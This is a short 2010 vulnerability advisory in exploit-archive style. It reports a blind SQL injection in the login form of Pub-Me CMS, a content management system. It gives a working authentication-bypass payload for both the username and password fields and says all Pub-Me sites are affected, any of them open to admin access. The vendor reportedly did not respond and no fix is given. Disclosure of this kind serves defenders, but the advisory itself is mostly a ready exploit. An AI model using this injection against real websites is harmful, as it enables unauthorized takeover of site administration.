_______ _____ ___
|||||.'_|||__| _||___|___||__||__|
Pub-Me CMS Blind SQL Injection Vulnerability
Name:Pub-Me CMS
Vendor:http://www.pub-me.com/
Versions Affected://unknown,all current affected - devel. homepage &33 clients web pages
Software Link: Not aviable, Demo can be requested by e-mail from vendor
Found by:H4f,<Sec was born project, Anonymous submission>
Contact: zotrob [at] gmail [dot] com
Date:2010-10-25
X. INDEX
I.ABOUT THE APPLICATION
II. DESCRIPTION
III.ANALYSIS
IV. SAMPLE CODE
V.FIX
I. ABOUT THE APPLICATION
________________________
Pub-Me Content Managment System is designed to make it possible for you to pay full
attention to the content without having to bother about technologies.
II. DESCRIPTION
_______________
NOT properly sanitised form before being used
in a SQL query.
III. ANALYSIS
_____________
Summary:
All Pub-Me based websites are vulnerable,any more/less trained monkey can reach admin panel.
______________________
IV. SAMPLE CODE
_______________
Blind SQL Injection
Login> ' or0=0#
Pass>' or0=0#
V. FIX
______
Vedor contacted, no reponse.
